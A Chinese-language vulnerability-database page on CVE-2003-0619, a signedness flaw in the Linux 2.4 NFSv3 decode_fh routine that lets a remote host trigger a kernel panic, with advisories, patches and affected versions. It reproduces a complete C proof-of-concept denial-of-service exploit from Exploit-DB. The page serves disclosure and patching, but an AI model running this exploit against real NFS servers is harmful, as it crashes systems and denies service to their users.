CVE-2003-0619
CVSS5.0
发布时间 :2003-08-27 00:00:00
修订时间 :2016-10-17 22:35:54
NMCOES    

[原文]Integer signedness error in the decode_fh function of nfs3xdr.c in Linux kernel before 2.4.21 allows remote attackers to cause a denial of service (kernel panic) via a negative size value within XDR data of an NFSv3 procedure call.


[CNNVD]Linux Kernel 2.4 XDR数据包处理NFSv3远程服务拒绝漏洞(CNNVD-200308-155)

        Linux kernel 2.4.21之前版本的nfs3xdr.c的decode_fh函数中存在整数符号错误漏洞。远程攻击者可以借助NFSv3进程调用的XDR数据中的负值导致服务拒绝(内核恐慌)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:386Lunix Kernel NFSv3 Procedure Kernel Panic Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0619
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0619
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-155
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105950927708272&w=2
(UNKNOWN)  BUGTRAQ  20030729 Remote Linux Kernel < 2.4.21 DoS in XDR routine.
http://www.debian.org/security/2004/dsa-358
(UNKNOWN)  DEBIAN  DSA-358
http://www.redhat.com/support/errata/RHSA-2003-198.html
(UNKNOWN)  REDHAT  RHSA-2003:198
http://www.redhat.com/support/errata/RHSA-2003-239.html
(UNKNOWN)  REDHAT  RHSA-2003:239

- 漏洞信息

Linux Kernel 2.4 XDR数据包处理NFSv3远程服务拒绝漏洞
中危 边界条件错误
2003-08-27 00:00:00 2005-10-20 00:00:00
远程  
        Linux kernel 2.4.21之前版本的nfs3xdr.c的decode_fh函数中存在整数符号错误漏洞。远程攻击者可以借助NFSv3进程调用的XDR数据中的负值导致服务拒绝(内核恐慌)。

- 公告与补丁

        SuSE has released advisory SUSE-SA:2004:035 mainly to address the vulnerability described in BID 11281. However, in the addendum of this advisory, it is reported that fixes for the issues described in this BID are now available on the SuSE update FTP server for download. Customers are advised to see the referenced advisory for further information regarding obtaining and applying appropriate updates.
        Debian has released advisory DSA 358-4 to address this issue.
        Red Hat has released an advisory (RHSA-2003:198-16) containing updated IA64 fixes for Red Hat Enterprise Linux AS (v. 2.1) and Red Hat Linux Advanced Workstation 2.1 for the Itanium Processor. These fixes are only available through the Red Hat Network which can be found at
        http://rhn.redhat.com/.
        Red Hat has also released an advisory (RHSA-2003-239) containing kernel fixes for Red Hat Enterprise Linux AS, ES, and WS(v. 2.1). These fixes are also only available through the Red Hat Network which can be found at
        http://rhn.redhat.com/.
        Red Hat security advisory RHSA-2003:172-27 has been released to address this and other issues. However, this advisory is superceded by RHBA-2003:263-05, which addresses unrelated bugs but provides Kernel updates that include more recent fixes for this and other security vulnerabilities.
        Conectiva has released a security advisory (CLSA-2003:730) containing fixes to address this issue in CLEE 1.0. Users are advised to upgrade as soon as possible.
        Conectiva has released a security advisory (CLA-2003:796) containing fixes to address this issue in Conectiva Linux 8.
        SuSE has released advisory SUSE-SA:2004:028 along with fixes dealing with this issue. Please see the referenced advisory for more information.
        SuSE has released a second advisory dealing with this issue. Apparently the kernel shipped with SuSE Linux versions 8.1, 8.2, and 9.0 were not patched for this issue. Please see the referenced advisory for more information.
        RedHat kernel-2.4.18-3.i686.rpm
        
        RedHat kernel-2.4.2-2.i386.rpm
        
        RedHat kernel-source-2.4.18-14.i386.rpm
        
        RedHat kernel-bigmem-2.4.18-14.i686.rpm
        
        RedHat kernel-BOOT-2.4.7-10.i386.rpm
        
        RedHat kernel-doc-2.4.2-2.i386.rpm
        
        RedHat kernel-2.4.20-8.athlon.rpm
        
        RedHat kernel-source-2.4.2-2.i386.rpm
        
        RedHat kernel-2.4.7-10.athlon.rpm
        
        RedHat kernel-doc-2.4.18-3.i386.rpm
        
        RedHat kernel-BOOT-2.4.20-8.i386.rpm
        
        RedHat kernel-2.4.20-8.i586.rpm
        
        RedHat kernel-2.4.7-10.i686.rpm
        
        RedHat kernel-bigmem-2.4.20-8.i686.rpm
        
        RedHat kernel-source-2.4.20-8.i386.rpm
        
        RedHat kernel-2.4.20-8.i686.rpm
        
        RedHat kernel-BOOT-2.4.18-3.i386.rpm
        
        RedHat kernel-doc-2.4.18-14.i386.rpm
        
        RedHat kernel-BOOT-2.4.2-2.i386.rpm
        

- 漏洞信息 (68)

Linux Kernel <= 2.4.20 decode_fh Denial of Service Exploit (EDBID:68)
linux dos
2003-07-29 Verified
0 Jared Stanbrough
N/A [点击下载]
/*
  Linux 2.4.20 knfsd kernel signed/unsigned decode_fh DoS
  Author: jared stanbrough <jareds pdx edu> 
  
  Vulnerable code: (fs/nfsd/nfs3xdr.c line 52-64)

  static inline u32 *
  decode_fh(u32 *p, struct svc_fh *fhp)
  {
        int size;
        fh_init(fhp, NFS3_FHSIZE);
        size = ntohl(*p++);
        if (size > NFS3_FHSIZE)
                return NULL;   

        memcpy(&fhp->fh_handle.fh_base, p, size);
        fhp->fh_handle.fh_size = size;
        return p + XDR_QUADLEN(size);
  }

  This code is called by quite a few XDR decoding routines. The below
  POC demonstrates the vulnerability by encoding a malicious fhsize
  at the beginning of a diroparg xdr argument. 
 
  To test this, the vulnerable host must have an accessible exported
  directory which was previously mounted by the attacker. _HOWEVER_ 
  it may be possible to trigger this bug by some other method.

  Fix: Simply change size to an unsigned int, or check for size < 0.
*/

#include <rpcsvc/nfs_prot.h>
#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>

#define NFSPROG 100003
#define NFSVERS 3
#define NFSPROC_GETATTR 1

static struct diropargs heh;

bool_t xdr_heh(XDR *xdrs, diropargs *heh) 
{
  int32_t werd = -1; 
  return xdr_int32_t(xdrs, &werd);
}

int main(void)
{
  CLIENT * client;
  struct timeval tv;

  client = clnt_create("marduk", NFSPROG, NFSVERS, "udp");
  
  if(client == NULL) {
      perror("clnt_create\n");
  }

  tv.tv_sec = 3;
  tv.tv_usec = 0;
  client->cl_auth = authunix_create_default();

  clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh,
            (xdrproc_t) xdr_void, NULL, tv);

  return 0;
}

// milw0rm.com [2003-07-29]
		

- 漏洞信息

2353
Linux Kernel NFS XDR DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

The Linux kernel contains a flaw that may allow a remote denial of service. The issue is that the "decode_fh" function in "nfs3xdr.c" fails to handle a negative size value in certain NFS calls, and will result in loss of availability for the platform.

- 时间线

2003-07-29 Unknow
2003-07-29 Unknow

- 解决方案

Upgrade to version 2.4.21 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of Service Vulnerability
Boundary Condition Error 8298
Yes No
2003-07-29 12:00:00 2009-07-11 10:56:00
Discovery of this vulnerability has been credited to Jared Stanbrough <jareds@pdx.edu>.

- 受影响的程序版本

SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
S.u.S.E. Novell Linux Desktop 1.0
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux 8.1
RedHat kernel-utils-2.4-8.29.i386.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-utils-2.4-8.13.i386.rpm
+ RedHat Linux 8.0
RedHat kernel-utils-2.4-7.4.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-uml-2.4.18-14.i686.rpm
+ RedHat Linux 8.0
RedHat kernel-source-2.4.7-10.i386.rpm
+ RedHat Linux 7.2
RedHat kernel-source-2.4.20-8.i386.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-source-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-source-2.4.18-3.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-source-2.4.18-14.i386.rpm
+ RedHat Linux 8.0
RedHat kernel-smp-2.4.7-10.i686.rpm
+ RedHat Linux 7.2
RedHat kernel-smp-2.4.7-10.i586.rpm
+ RedHat Linux 7.2
RedHat kernel-smp-2.4.7-10.athlon.rpm
+ RedHat Linux 7.2
RedHat kernel-smp-2.4.20-8.i686.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-smp-2.4.20-8.athlon.rpm
RedHat kernel-smp-2.4.2-2.i686.rpm
+ RedHat Linux 7.1
RedHat kernel-smp-2.4.2-2.i586.rpm
RedHat kernel-smp-2.4.18-3.i686.rpm
RedHat kernel-smp-2.4.18-3.i586.rpm
RedHat kernel-smp-2.4.18-3.athlon.rpm
+ RedHat Linux 7.3
RedHat kernel-smp-2.4.18-14.i686.rpm
RedHat kernel-smp-2.4.18-14.athlon.rpm
+ RedHat Linux 8.0
RedHat kernel-headers-2.4.7-10.i386.rpm
+ RedHat Linux 7.2
RedHat kernel-headers-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-enterprise-2.4.2-2.i686.rpm
+ RedHat Linux 7.1
RedHat kernel-doc-2.4.7-10.i386.rpm
RedHat kernel-doc-2.4.20-8.i386.rpm
RedHat kernel-doc-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-doc-2.4.18-3.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-doc-2.4.18-14.i386.rpm
+ RedHat Linux 8.0
RedHat kernel-debug-2.4.18-3.i686.rpm
RedHat kernel-debug-2.4.18-14.i686.rpm
+ RedHat Linux 8.0
RedHat kernel-BOOT-2.4.7-10.i386.rpm
+ RedHat Linux 7.2
RedHat kernel-BOOT-2.4.20-8.i386.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-BOOT-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-BOOT-2.4.18-3.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-BOOT-2.4.18-14.i386.rpm
RedHat kernel-bigmem-2.4.20-8.i686.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-bigmem-2.4.18-3.i686.rpm
+ RedHat Linux 7.3
RedHat kernel-bigmem-2.4.18-14.i686.rpm
+ RedHat Linux 8.0
RedHat kernel-2.4.7-10.i686.rpm
+ RedHat Linux 7.2
RedHat kernel-2.4.7-10.i386.rpm
+ RedHat Linux 7.2
RedHat kernel-2.4.7-10.athlon.rpm
+ RedHat Linux 7.2
RedHat kernel-2.4.20-8.i686.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-2.4.20-8.i586.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-2.4.20-8.athlon.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-2.4.2-2.i686.rpm
RedHat kernel-2.4.2-2.i586.rpm
RedHat kernel-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-2.4.18-3.i686.rpm
+ RedHat Linux 7.3
RedHat kernel-2.4.18-3.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-2.4.18-3.athlon.rpm
+ RedHat Linux 7.3
RedHat kernel-2.4.18-14.i686.rpm
+ RedHat Linux 8.0
RedHat kernel-2.4.18-14.i586.rpm
+ RedHat Linux 8.0
RedHat kernel-2.4.18-14.athlon.rpm
Linux kernel 2.4.21 pre4
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
Linux kernel 2.4.21 pre1
Linux kernel 2.4.21
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ SuSE SUSE Linux Enterprise Server 8
Linux kernel 2.4.20
Linux kernel 2.4.19 -pre6
Linux kernel 2.4.19 -pre5
Linux kernel 2.4.19 -pre4
Linux kernel 2.4.19 -pre3
Linux kernel 2.4.19 -pre2
Linux kernel 2.4.19 -pre1
Linux kernel 2.4.19
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ S.u.S.E. Linux 8.1
+ Slackware Linux -current
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
Linux kernel 2.4.18 pre-8
Linux kernel 2.4.18 pre-7
Linux kernel 2.4.18 pre-6
Linux kernel 2.4.18 pre-5
Linux kernel 2.4.18 pre-4
Linux kernel 2.4.18 pre-3
Linux kernel 2.4.18 pre-2
Linux kernel 2.4.18 pre-1
Linux kernel 2.4.18 x86
Linux kernel 2.4.18
+ Astaro Security Linux 2.0 23
+ Astaro Security Linux 2.0 16
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Linux 8.0
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Linux Office Server
+ S.u.S.E. Linux Openexchange Server
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. SuSE eMail Server 3.1
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Linux kernel 2.4.17
Linux kernel 2.4.16
+ Sun Cobalt RaQ 550
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
Linux kernel 2.4.1
Linux kernel 2.4 .0-test9
Linux kernel 2.4 .0-test8
Linux kernel 2.4 .0-test7
Linux kernel 2.4 .0-test6
Linux kernel 2.4 .0-test5
Linux kernel 2.4 .0-test4
Linux kernel 2.4 .0-test3
Linux kernel 2.4 .0-test2
Linux kernel 2.4 .0-test12
Linux kernel 2.4 .0-test11
Linux kernel 2.4 .0-test10
Linux kernel 2.4 .0-test1
Linux kernel 2.4

- 漏洞讨论

Linux Kernel 2.4 XDR handler routines for NFSv3 have been reported prone to a remote denial of service vulnerability.

The issue presents itself in the XDR handler routine contained in the nfs3xdr.c kernel source file. The issue is due to a signed/unsigned mismatch, when processing the size field of an XDR packet.

A remote attacker may exploit this issue to trigger a kernel panic and deny service to legitimate users of the system.

- 漏洞利用

The following proof of concept has been supplied:

- 解决方案

SuSE has released advisory SUSE-SA:2004:035 mainly to address the vulnerability described in BID 11281. However, in the addendum of this advisory, it is reported that fixes for the issues described in this BID are now available on the SuSE update FTP server for download. Customers are advised to see the referenced advisory for further information regarding obtaining and applying appropriate updates.

Debian has released advisory DSA 358-4 to address this issue.

Red Hat has released an advisory (RHSA-2003:198-16) containing updated IA64 fixes for Red Hat Enterprise Linux AS (v. 2.1) and Red Hat Linux Advanced Workstation 2.1 for the Itanium Processor. These fixes are only available through the Red Hat Network which can be found at http://rhn.redhat.com/.

Red Hat has also released an advisory (RHSA-2003-239) containing kernel fixes for Red Hat Enterprise Linux AS, ES, and WS(v. 2.1). These fixes are also only available through the Red Hat Network which can be found at http://rhn.redhat.com/.

Red Hat security advisory RHSA-2003:172-27 has been released to address this and other issues. However, this advisory is superceded by RHBA-2003:263-05, which addresses unrelated bugs but provides Kernel updates that include more recent fixes for this and other security vulnerabilities.

Conectiva has released a security advisory (CLSA-2003:730) containing fixes to address this issue in CLEE 1.0. Users are advised to upgrade as soon as possible.

Conectiva has released a security advisory (CLA-2003:796) containing fixes to address this issue in Conectiva Linux 8.

SuSE has released advisory SUSE-SA:2004:028 along with fixes dealing with this issue. Please see the referenced advisory for more information.

SuSE has released a second advisory dealing with this issue. Apparently the kernel shipped with SuSE Linux versions 8.1, 8.2, and 9.0 were not patched for this issue. Please see the referenced advisory for more information.


RedHat kernel-2.4.18-3.i686.rpm

RedHat kernel-2.4.2-2.i386.rpm

RedHat kernel-source-2.4.18-14.i386.rpm

RedHat kernel-bigmem-2.4.18-14.i686.rpm

RedHat kernel-BOOT-2.4.7-10.i386.rpm

RedHat kernel-doc-2.4.2-2.i386.rpm

RedHat kernel-2.4.20-8.athlon.rpm

RedHat kernel-source-2.4.2-2.i386.rpm

RedHat kernel-2.4.7-10.athlon.rpm

RedHat kernel-doc-2.4.18-3.i386.rpm

RedHat kernel-BOOT-2.4.20-8.i386.rpm

RedHat kernel-2.4.20-8.i586.rpm

RedHat kernel-2.4.7-10.i686.rpm

RedHat kernel-bigmem-2.4.20-8.i686.rpm

RedHat kernel-source-2.4.20-8.i386.rpm

RedHat kernel-2.4.20-8.i686.rpm

RedHat kernel-BOOT-2.4.18-3.i386.rpm

RedHat kernel-doc-2.4.18-14.i386.rpm

RedHat kernel-BOOT-2.4.2-2.i386.rpm

RedHat kernel-2.4.7-10.i386.rpm

RedHat kernel-2.4.18-3.athlon.rpm

RedHat kernel-2.4.18-3.i386.rpm

RedHat kernel-bigmem-2.4.18-3.i686.rpm

RedHat kernel-source-2.4.7-10.i386.rpm

RedHat kernel-2.4.18-14.i586.rpm

RedHat kernel-2.4.18-14.i686.rpm

Linux kernel 2.4.18

Linux kernel 2.4.19

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站